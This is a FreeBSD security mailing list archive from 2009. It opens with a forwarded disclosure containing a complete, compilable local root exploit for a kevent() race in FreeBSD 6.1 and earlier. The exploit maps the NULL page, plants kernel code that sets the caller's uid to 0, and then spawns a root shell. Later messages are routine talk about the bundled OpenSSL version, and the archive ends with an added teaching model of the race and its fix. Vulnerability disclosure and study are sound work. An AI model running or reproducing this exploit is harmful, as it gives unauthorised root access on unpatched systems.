From owner-freebsd-security@FreeBSD.ORG Mon Aug 24 18:25:32 2009
Date: Mon, 24 Aug 2009 11:01:12 -0700
From: lxn smth <lxn.smth@gmail.com>
To: freebsd-security@freebsd.org
Message-ID: <864f75cb0908241101o309219d5x58261bb746eccb78@mail.gmail.com>
In-Reply-To: <4A90258F.6090606@freebsd.lublin.pl>
Subject: Re: FreeBSD <= 6.1 kqueue() NULL pointer dereference

FYI.

2009/8/22 Przemyslaw Frasunek:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> FreeBSD <= 6.1 suffers from a classical check/use race condition on SMP
> systems in the kevent() syscall, leading to a kernel mode NULL pointer
> dereference. It can be triggered by spawning two threads: the 1st thread
> looping on open() and close() syscalls, and the 2nd thread looping on
> kevent(), trying to add a possibly invalid file descriptor.
>
> The bug was fixed in 6.1-STABLE, just before the release of 6.2-RELEASE, but
> was not recognized as a security vulnerability.
>
> The following code exploits this vulnerability to run a root shell.
>
> /* 22.08.2009, babcia padlina
>  * FreeBSD kevent() race condition exploit
>  *
>  * works only on multiprocessor systems
>  * gcc -o padlina padlina.c -lpthread
>  *
>  * with thanks to Pawel Pisarczyk for in-depth ia-32 architecture
>  * discussion
>  */
>
> /* _KERNEL exposes the kernel layouts of struct thread, struct proc and
>  * struct ucred that kernel_code() walks. The header names were lost when
>  * this archive was rendered; the list below is reconstructed from what the
>  * code uses. */
> #define _KERNEL
>
> #include <sys/param.h>
> #include <sys/types.h>
> #include <sys/mman.h>
> #include <sys/event.h>
> #include <sys/time.h>
> #include <sys/queue.h>
> #include <sys/lock.h>
> #include <sys/mutex.h>
> #include <sys/proc.h>
> #include <sys/ucred.h>
>
> #include <fcntl.h>
> #include <pthread.h>
> #include <stdio.h>
> #include <string.h>
> #include <unistd.h>
>
> int fd;
> int kq;
> struct kevent kev, ke[10];
> struct timespec timeout;
> int gotroot = 0;
>
> /* Copied to the user mapping at address 0 and executed in kernel mode
>  * once the race makes the kernel call through the NULL pointer. On
>  * FreeBSD/i386 %fs:0 is the per-CPU curthread pointer. */
> static void kernel_code(void) {
>         struct thread *thread;
>         gotroot = 1;
>         asm(
>                 "pushl %%eax;"
>                 "movl %%fs:0, %0"
>                 : "=r"(thread)
>         );
>         thread->td_proc->p_ucred->cr_uid = 0;
>         asm("popl %eax");
>         return;
> }
>
> /* 2nd thread: keep registering whatever fd the opener thread last
>  * produced, which may already be closed by the time kevent() uses it. */
> void *do_thread(void *arg) {
>         sleep(1);
>
>         while (!gotroot) {
>                 memset(&kev, 0, sizeof(kev));
>                 EV_SET(&kev, fd, EVFILT_VNODE, EV_ADD, 0, 0, NULL);
>
>                 /* eventlist is the ke[] array and nevents its element
>                  * count (the posted code passed sizeof(ke) here). */
>                 if (kevent(kq, &kev, 1, ke, sizeof(ke) / sizeof(ke[0]),
>                     &timeout) < 0) {
>                         perror("kevent");
>                 }
>         }
>
>         return NULL;
> }
>
> /* 1st thread: open()/close() in a tight loop so the fd is invalidated
>  * between kevent()'s check and its use. */
> void *do_thread2(void *arg) {
>         while (!gotroot) {
>                 if ((fd = open("/tmp/.padlina", O_RDWR | O_CREAT, 0600)) < 0)
>                         perror("open");
>
>                 close(fd);
>         }
>
>         return NULL;
> }
>
> int main(void) {
>         pthread_t pth, pth2;
>         unsigned char *p, *sp;
>
>         /* Map the zero page so the kernel's NULL dereference lands in
>          * user-controlled, executable memory. */
>         if (mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
>             MAP_ANON | MAP_FIXED, -1, 0) < 0) {
>                 perror("mmap");
>                 return -1;
>         }
>
>         /* Fill the page with "ret" (0xc3) so any entry offset returns
>          * cleanly, then copy kernel_code() up to its own first "ret". */
>         memset((void *)0, 0xc3, 0x1000);
>
>         for (p = (unsigned char *)0, sp = (unsigned char *)kernel_code;
>             *sp != 0xc3;)
>                 *p++ = *sp++;
>
>         if ((kq = kqueue()) < 0) {
>                 perror("kqueue");
>                 return -1;
>         }
>
>         pthread_create(&pth, NULL, do_thread, NULL);
>         pthread_create(&pth2, NULL, do_thread2, NULL);
>
>         timeout.tv_sec = 0;
>         timeout.tv_nsec = 1;
>
>         while (!gotroot)
>                 usleep(100);
>
>         setuid(0);
>         execl("/bin/sh", "sh", (char *)NULL);
>
>         printf("exploit failed\n");
>         return 0;
> }
>
> - --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
> * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iEYEARECAAYFAkqQJY8ACgkQkxEnBiV4/K1IRACeI/GYTKhzGqPJLkpheDV8rEIl
> yFMAnAo6czNexms9f4zMwUjzAioNRtqz
> =8qMi
> -----END PGP SIGNATURE-----

From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 12:12:45 2009
Date: Thu, 27 Aug 2009 14:51:32 +0300
From: Volodymyr Kostyrko <c.kworr@gmail.com>
To: freebsd-security@freebsd.org
Message-ID: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
Subject: bundled openssl version

I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
Why not 0.9.8f? Doesn't someone need TLS extensions working?

-- 
Sphinx of black quartz judge my vow.

From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 12:58:12 2009
Date: Thu, 27 Aug 2009 14:58:03 +0200
From: Jérôme Le Gal <jerome@joworld.net>
To: 'Volodymyr Kostyrko', freebsd-security@freebsd.org
In-Reply-To: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
Subject: RE: bundled openssl version
Hi,

Why don't you use security/openssl?

-----Original message-----
From: owner-freebsd-security@freebsd.org [mailto:owner-freebsd-security@freebsd.org] On behalf of Volodymyr Kostyrko
Sent: Thursday, 27 August 2009 13:52
To: freebsd-security@freebsd.org
Subject: bundled openssl version

I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
Why not 0.9.8f? Doesn't someone need TLS extensions working?

-- 
Sphinx of black quartz judge my vow.
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

From owner-freebsd-security@FreeBSD.ORG Thu Aug 27 18:03:17 2009
Date: Thu, 27 Aug 2009 19:29:46 +0200
From: Zahemszky Gábor <Gabor@Zahemszky.HU>
To: freebsd-security@freebsd.org
Message-ID: <20090827192946.7f5782c3@Picasso.Zahemszky.HU>
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
Organization: Zahemszky Bt.
Subject: Re: bundled openssl version

>> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
>> Why not 0.9.8f? Doesn't someone need TLS extensions working?

> Why don't you use security/openssl ?

Why do we need a port, if we can / could use the program from the base
system?

Zahy < Gabor at Zahemszky dot HU >

-- 
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!';
IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';
set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break;
[[ $i = ??? ]]&&j=$i&&i=${i%?};
typeset -i40 i=8#$i;print -n ${i#???};
[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};
IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2;
[[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j"

From owner-freebsd-security@FreeBSD.ORG Fri Aug 28 07:23:17 2009
Date: Fri, 28 Aug 2009 00:03:31 +0100
From: István <leccine@gmail.com>
To: Zahemszky Gábor
Cc: freebsd-security@freebsd.org
In-Reply-To: <20090827192946.7f5782c3@Picasso.Zahemszky.HU>
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com> <20090827192946.7f5782c3@Picasso.Zahemszky.HU>
Subject: Re: bundled openssl version

custom flags -O666 and so on:)

On Thu, Aug 27, 2009 at 6:29 PM, Zahemszky Gábor wrote:
> >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
> >> Why not 0.9.8f? Doesn't someone need TLS extensions working?
>
> > Why don't you use security/openssl ?
>
> Why do we need a port, if we can / could use the program from the base
> system?
>
> Zahy < Gabor at Zahemszky dot HU >
>
> --
> #!/bin/ksh
> Z='21N16I25C25E30, 40M30E33E25T15U!';
> IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';
> set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break;
> [[ $i = ??? ]]&&j=$i&&i=${i%?};
> typeset -i40 i=8#$i;print -n ${i#???};
> [[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};
> IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2;
> [[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j"

-- 
the sun shines for all
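The check/use race that Przemyslaw Frasunek's kqueue() message at the top of this archive describes, modelled in user space. This is an added example, not code from that posting, from the exploit, or from the FreeBSD kernel; every identifier in it (fdtable, register_racy, register_safe, the window hook) is illustrative. It shows the vulnerable shape (validate the descriptor under the table lock, drop the lock, re-read the slot to use it) next to the fixed shape (take a reference while the lock still guarantees the check, and use that held pointer). The "other CPU" closing the descriptor is simulated by a hook invoked inside the window, so the outcome is deterministic instead of depending on scheduling as the real race does.

```c
#include <stdio.h>
#include <stdlib.h>

#define NFDS 8

/* Minimal lock model: aborts on recursive take or stray release, so a
 * lock-discipline mistake in the code below would show up immediately. */
struct lock { int held; };
static void lock_acquire(struct lock *l) { if (l->held) abort(); l->held = 1; }
static void lock_release(struct lock *l) { if (!l->held) abort(); l->held = 0; }

struct file {
    int refcount;
    int ino;                     /* stands in for the object a knote would attach to */
};

struct fdtable {
    struct lock lock;
    struct file *slots[NFDS];
};

static void fhold(struct file *fp) { fp->refcount++; }
static void fdrop(struct file *fp) { if (--fp->refcount == 0) free(fp); }

/* open(): allocate the object and install it in slot fd with the table's reference. */
static void fd_open(struct fdtable *t, int fd, int ino) {
    struct file *fp = calloc(1, sizeof *fp);
    if (fp == NULL) abort();
    fp->refcount = 1;
    fp->ino = ino;
    lock_acquire(&t->lock);
    t->slots[fd] = fp;
    lock_release(&t->lock);
}

/* close(): clear the slot under the lock, then drop the table's reference. */
static int fd_close(struct fdtable *t, int fd) {
    if (fd < 0 || fd >= NFDS) return -1;
    lock_acquire(&t->lock);
    struct file *fp = t->slots[fd];
    if (fp != NULL) t->slots[fd] = NULL;
    lock_release(&t->lock);
    if (fp == NULL) return -1;
    fdrop(fp);
    return 0;
}

/* Hook standing in for the open()/close() thread: runs inside the check/use window. */
typedef void (*window_hook_t)(struct fdtable *t, int fd);
static void close_in_window(struct fdtable *t, int fd) { (void)fd_close(t, fd); }

/* Vulnerable pattern: check fd under the lock, drop the lock, re-read the slot
 * to use it. Returns the ino on success, -1 if the check rejects fd, and -2
 * when the use step finds NULL, the point where a kernel would dereference it. */
static int register_racy(struct fdtable *t, int fd, window_hook_t hook) {
    lock_acquire(&t->lock);
    int valid = fd >= 0 && fd < NFDS && t->slots[fd] != NULL;   /* check */
    lock_release(&t->lock);
    if (!valid) return -1;

    if (hook != NULL) hook(t, fd);          /* other CPU closes fd here */

    struct file *fp = t->slots[fd];         /* use: unsynchronised re-read */
    if (fp == NULL) return -2;
    return fp->ino;
}

/* Fixed pattern: take our own reference while the lock still covers the
 * check, and use that pointer. A concurrent close now only drops the table's
 * reference; the object stays valid until we fdrop() it ourselves. */
static int register_safe(struct fdtable *t, int fd, window_hook_t hook) {
    lock_acquire(&t->lock);
    if (fd < 0 || fd >= NFDS || t->slots[fd] == NULL) {
        lock_release(&t->lock);
        return -1;
    }
    struct file *fp = t->slots[fd];
    fhold(fp);
    lock_release(&t->lock);

    if (hook != NULL) hook(t, fd);          /* same interleaving as above */

    int ino = fp->ino;
    fdrop(fp);
    return ino;
}

/* Run one lookup variant against a constructed table: fd 3 -> ino 42. */
int demo(int (*reg)(struct fdtable *, int, window_hook_t), window_hook_t hook) {
    struct fdtable t = { { 0 }, { NULL } };
    fd_open(&t, 3, 42);
    int rc = reg(&t, 3, hook);
    (void)fd_close(&t, 3);                  /* no-op if the hook already closed it */
    return rc;
}

int demo_racy(void)    { return demo(register_racy, close_in_window); }   /* -2 */
int demo_safe(void)    { return demo(register_safe, close_in_window); }   /* 42 */
int demo_no_race(void) { return demo(register_racy, NULL); }              /* 42 */

int main(void) {
    printf("racy lookup, close in window: %d\n", demo_racy());
    printf("safe lookup, close in window: %d\n", demo_safe());
    printf("racy lookup, no close:        %d\n", demo_no_race());
    return 0;
}
```

The -2 from demo_racy() is the model's stand-in for the kernel NULL dereference: the descriptor passed the check, but nothing kept the object alive across the window, so the second read of the slot sees the close. demo_no_race() shows the same code returning the right answer whenever the close happens to land outside the window, which is why a bug of this shape only reproduces reliably on SMP and under a tight loop.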